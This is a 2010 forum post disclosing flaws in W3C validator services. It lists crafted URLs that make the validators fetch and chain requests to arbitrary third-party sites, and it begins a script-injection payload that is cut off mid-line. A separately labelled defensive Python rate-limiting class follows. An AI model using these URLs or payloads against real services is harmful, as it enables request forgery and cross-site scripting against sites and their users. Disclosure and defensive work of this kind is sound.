Professional Webmasters Community

New vulnerabilities at www.w3.org

Post  andry Wed Aug 11, 2010 11:20 pm

These are Abuse of Functionality, Insufficient Anti-automation and Cross-Site Scripting vulnerabilities in http://www.w3.org, the website of the World Wide Web Consortium (W3C). I will soon tell the website administrator about them.

In total, the following W3C validators are vulnerable:

http://www.w3.org/2003/12/semantic-extractor.html
http://www.w3.org/services/tidy
http://validator.w3.org/mobile/
http://www.w3.org/P3P/validator

Abuse of Functionality:

Code:
http://www.w3.org/2005/08/online_xslt/xslt?xmlfile=http%3A%2F%2Fwww.w3.org%2Fservices%2Ftidy%3FpassThroughXHTML%3D1%26docAddr%3Dhttp%253A%252F%252Fgoogle.com&xslfile=http%3A%2F%2Fwww.w3.org%2F2002%2F08%2Fextract-semantic.xsl
http://www.w3.org/2005/08/online_xslt/xslt?xmlfile=http://google.com&xslfile=http%3A%2F%2Fwww.w3.org%2F2002%2F08%2Fextract-semantic.xsl
http://www.w3.org/2005/08/online_xslt/xslt?xmlfile=http%3A%2F%2Fwww.w3.org%2Fservices%2Ftidy%3FpassThroughXHTML%3D1%26docAddr%3Dhttp%253A%252F%252Fgoogle.com&xslfile=http://google.com

http://www.w3.org/services/tidy?docAddr=http://google.com

http://validator.w3.org/mobile/check?docAddr=http://google.com

http://validator.w3.org/p3p/20020128/p3p.pl?uri=http://google.com

http://validator.w3.org/p3p/20020128/policy.pl?uri=http://google.com

This functionality of the site can be used for CSRF attacks on other sites.

Insufficient Anti-automation:

These pages have no protection against automated requests (captcha). This makes it possible to automate CSRF attacks on other sites.

XSS:

[url=http://www.w3.org/2005/08/online_xslt/xslt?xmlfile=&xslfile=%3Cscript%3Ealert(document
andry
Moderator

Posts : 467
Join date : 2010-05-07
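
An added example, not part of the original post and not W3C code: a server-side policy check that a URL-fetching validator could run on the `docAddr`/`uri`/`xmlfile` value before fetching it, covering the chaining and the missing anti-automation described above. The class name `FetchPolicy`, the limits and the sample addresses are assumptions.

```python
import time
from collections import defaultdict, deque
from urllib.parse import urlsplit

# Hosts of the fetching service itself (the two hosts named in the post).
SERVICE_HOSTS = {"www.w3.org", "validator.w3.org"}
WINDOW = 60.0          # seconds; assumed policy value
MAX_PER_CLIENT = 10    # fetches one client may trigger per window (assumed)
MAX_PER_TARGET = 5     # fetches sent to one third-party host per window (assumed)


class FetchPolicy:
    """Decides whether a validator may fetch a user-supplied document URL."""

    def __init__(self, clock=time.monotonic):
        self._clock = clock
        self._by_client = defaultdict(deque)   # client IP -> fetch timestamps
        self._by_target = defaultdict(deque)   # target host -> fetch timestamps

    @staticmethod
    def _recent(queue, now):
        # Drop timestamps that fell out of the sliding window, return the rest.
        while queue and now - queue[0] >= WINDOW:
            queue.popleft()
        return len(queue)

    def check(self, client_ip, doc_url):
        """Return (allowed, reason) for one requested fetch."""
        try:
            parts = urlsplit(doc_url)
            host = (parts.hostname or "").lower().rstrip(".")
        except ValueError:                      # malformed authority part
            return False, "scheme"
        if parts.scheme not in ("http", "https") or not host:
            return False, "scheme"
        # Refuse to fetch our own services: fetching them is what lets one
        # service be chained through another (xslt -> tidy -> other site).
        if host in SERVICE_HOSTS:
            return False, "self-reference"
        now = self._clock()
        clients, targets = self._by_client[client_ip], self._by_target[host]
        if self._recent(clients, now) >= MAX_PER_CLIENT:
            return False, "client-rate"
        if self._recent(targets, now) >= MAX_PER_TARGET:
            return False, "target-rate"
        clients.append(now)
        targets.append(now)
        return True, "ok"
```

The per-target limit is counted across all clients, so spreading requests over many source addresses does not raise the load the service can place on one third-party host.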
